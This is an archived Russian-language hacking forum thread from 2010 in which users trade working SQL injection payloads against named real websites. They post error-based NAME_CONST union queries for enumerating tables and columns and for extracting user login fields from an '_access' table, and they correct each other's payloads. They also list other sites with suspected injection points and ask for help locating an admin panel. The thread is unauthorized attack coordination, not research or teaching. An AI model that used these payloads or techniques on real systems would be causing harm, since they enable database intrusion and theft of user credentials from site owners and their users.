ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
20.10.2010, 23:36
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 16
Провел на форуме:
97465
Репутация:
0
|
|
Сообщение от Konqi
Konqi said:
http://ollis.ru/index.php?id=S00000645')+union+select * FROM (select * FROM (select NAME_CONST((select table_name FROM information_schema.tables+where+table_schema=datab ase() LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select table_name FROM information_schema.tables+where+table_schema=datab ase() LIMIT 1), 14)e) b)a--+&type=ollis_picture&action=&mode=popup
перебирай лимит ом
Просто лимит 1 потом 2 и т.д.? Не догнал...
Делаю так
http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select user FROM _access LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select user FROM _access LIMIT 1), 14)e) b)a--+
гонит Unknown column 'user' in 'field list'
побывал и логин и много чего
|
|
|
21.10.2010, 06:06
|
|
Новичок
Регистрация: 30.03.2010
Сообщений: 2
Провел на форуме:
21162
Репутация:
0
|
|
http://comunidad.encuentra24.com/browse_businesses_locations.php?businesscat_id=10
|
|
|
|
21.10.2010, 06:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
2142
Репутация:
6
|
|
и что ?
|
|
|
|
21.10.2010, 09:40
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Сообщение от MastaBass1
MastaBass1 said:
http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select user FROM _access LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select user FROM _access LIMIT 1), 14)e) b)a--+
гонит Unknown column 'user' in 'field list'
побывал и логин и много чего
Хватит уже тыкать таблицы и колонки наугад. У тебя 5-ая ветка, ничего подбирать не надо, просто почитай хоть одну статью...
Колонки в таблице _access
http://ollis.ru/index.php?id=S00000645')+union+select * FROM (select * FROM (select NAME_CONST((select column_name FROM information_schema.columns+where+table_name=0x5f61 6363657373 LIMIT 0,1), 14)d) as t JOIN (select NAME_CONST((select column_name FROM information_schema.columns+where+table_name=0x5f61 6363657373 LIMIT 0,1), 14)e) b)a--+&type=ollis_picture&action=&mode=popup
Ну и:
http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select user_id FROM _access LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select user_id FROM _access LIMIT 1), 14)e) b)a--+
|
|
|
|
21.10.2010, 11:33
|
|
Познающий
Регистрация: 29.08.2009
Сообщений: 75
Провел на форуме:
315861
Репутация:
5
|
|
Сообщение от None
http://veer[antigoogle]mirov.ru/forum/?f=1&p='
Странная скуля, даже кол-во полей подобрать немогу.
|
|
|
|
21.10.2010, 17:43
|
|
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379
Репутация:
1069
|
|
|
|
|
|
21.10.2010, 20:33
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
помгите найти админку nll.com =)
|
|
|
|
21.10.2010, 21:05
|
|
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684
Репутация:
136
|
|
nll.com/horde/imp/login.php
|
|
|
|
21.10.2010, 21:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
2060
Репутация:
0
|
|
Нужна помощь,здесь есть иньекция
http://steroidanabolic.com/phpBB/privmsg.php?mode='%22%5C'%5C%22);|]*{%0d%0a%3C%00%3E&u=186
http://steroidanabolic.com/phpBB/viewforum.php?f=1&start=-268435455
|
|
|
|
21.10.2010, 23:27
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от YuNi|[c
YuNi|[c said:
спс
пробовал так:
http://site.net/script.php?seeking_sex=1') and ('1'='1+order by 1/*
без ошибок но и без профилей
а так:
http://site.net/script.php?seeking_sex=-1') and ('1'='1+order by 1/*
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2' OR user_master.seeking_sexuality like '%,2' OR user_mas' at line 13
http://site.net/script.php?seeking_sex=-1') OR ('1'='1+order by 1/*
без ошибок но и без профилей
что то не получится чтол
ну лан палит то палим линк главное найти хот какую решение:
http://www.nz.adultxdating.com/search_get.html
POST
txt_user_sex=2&txt_agefrom=20&txt_ageto=25&search_ submit.x=52&search_submit.y=14&sel_state_id=12&txt _seeking_sex%5B%5D=1'
Это уже посмотрел профи и пока ниче может народ что скажет (много мозгов)? В первые встречаю такой гемор.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
